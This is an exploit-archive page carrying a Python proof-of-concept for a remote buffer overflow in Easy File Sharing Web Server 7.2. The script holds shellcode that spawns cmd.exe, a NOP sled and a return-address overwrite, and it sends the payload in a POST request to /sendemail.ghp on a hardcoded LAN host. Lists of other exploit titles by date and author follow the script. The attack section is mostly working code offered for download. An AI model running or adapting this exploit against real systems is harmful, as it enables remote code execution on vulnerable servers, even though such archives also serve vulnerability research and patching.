Menu

Search for hundreds of thousands of exploits

"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow"

Author

Exploit author

"Touhid M.Shaikh"

Platform

Exploit platform

windows

Release date

Exploit published date

2017-06-12

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/python

# Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow
# Author : Touhid M.Shaikh
# Date : 12 June, 2017
# Contact: touhidshaikh22@gmail.com
# Version: 7.2
# category: Remote Exploit
# Tested on: Windows XP SP3 EN [Version 5.1.2600]


"""
######## Description ########

    What is Easy File Sharing Web Server 7.2 ?
    Easy File Sharing Web Server is a file sharing software that allows
visitors to upload/download files easily through a Web Browser. It can help
you share files with your friends and colleagues. They can download files
from your computer or upload files from theirs.They will not be required to
install this software or any other software because an internet browser is
enough. Easy File Sharing Web Server also provides a Bulletin Board System
(Forum). It allows remote users to post messages and files to the forum.
The Secure Edition adds support for SSL encryption that helps protect
businesses against site spoofing and data corruption.


######## Video PoC and Article ########

https://www.youtube.com/watch?v=Mdmd-7M8j-M
http://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/

 """

import httplib


total = 4096

#Shellcode Open CMD.exe
shellcode = (
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0")


our_code = "\x90"*100 #NOP Sled
our_code += shellcode
our_code += "\x90"*(4072-100-len(shellcode))

# point Ret to Nop Sled
our_code += "\x3c\x62\x83\x01" # Overwrite RET
our_code += "\x90"*12 #Nop Sled
our_code += "A"*(total-(4072+16)) # ESP pointing



# Server address and POrt
httpServ = httplib.HTTPConnection("192.168.1.6", 80)
httpServ.connect()

httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % our_code)

response = httpServ.getresponse()


httpServ.close()

"""
NOTE : After Exiting to cmd.exe our server will be crash bcz of esp
Adjust esp by yourself ... hehhehhe...
"""

"""
__ __| _ \  |   | |   |_ _| __ \
   |  |   | |   | |   |  |  |   |
   |  |   | |   | ___ |  |  |   |
  _| \___/ \___/ _|  _|___|____/

Touhid M.Shaikh
"""
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-03-11 "PlaySMS 1.4.3 - Template Injection / Remote Code Execution" webapps php "Touhid M.Shaikh"
2018-03-30 "Vtiger CRM 6.3.0 - (Authenticated) Arbitrary File Upload (Metasploit)" webapps php "Touhid M.Shaikh"
2017-09-29 "Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow" local windows "Touhid M.Shaikh"
2017-09-28 "DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow" local windows "Touhid M.Shaikh"
2017-09-28 "DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)" dos windows "Touhid M.Shaikh"
2017-09-26 "Tiny HTTPd 0.1.0 - Directory Traversal" remote linux "Touhid M.Shaikh"
2017-09-04 "Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow" local windows "Touhid M.Shaikh"
2017-08-28 "Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Local Buffer Overflow (SEH)" local windows "Touhid M.Shaikh"
2017-08-28 "Easy RM RMVB to DVD Burner 1.8.11 - Local Buffer Overflow (SEH)" local windows "Touhid M.Shaikh"
2017-08-12 "RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)" webapps hardware "Touhid M.Shaikh"
2017-08-10 "Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting" webapps php "Touhid M.Shaikh"
2017-08-01 "VehicleWorkshop - Authentication Bypass" webapps php "Touhid M.Shaikh"
2017-08-01 "VehicleWorkshop - Arbitrary File Upload" webapps php "Touhid M.Shaikh"
2017-06-12 "Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow" remote windows "Touhid M.Shaikh"
2017-06-11 "Easy File Sharing Web Server 7.2 - Authentication Bypass" remote windows "Touhid M.Shaikh"
2017-05-31 "Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting" webapps php "Touhid M.Shaikh"
2017-05-30 "Piwigo Plugin Facetag 0.0.3 - SQL Injection" webapps php "Touhid M.Shaikh"
2017-05-26 "QWR-1104 Wireless-N Router - Cross-Site Scripting" webapps hardware "Touhid M.Shaikh"
2017-05-21 "PlaySMS 1.4 - 'import.php' Remote Code Execution" webapps php "Touhid M.Shaikh"
2017-05-19 "PlaySMS 1.4 - Remote Code Execution" webapps php "Touhid M.Shaikh"
2017-05-19 "D-Link DIR-600M Wireless N 150 - Authentication Bypass" webapps hardware "Touhid M.Shaikh"
2017-05-14 "PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload" webapps php "Touhid M.Shaikh" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected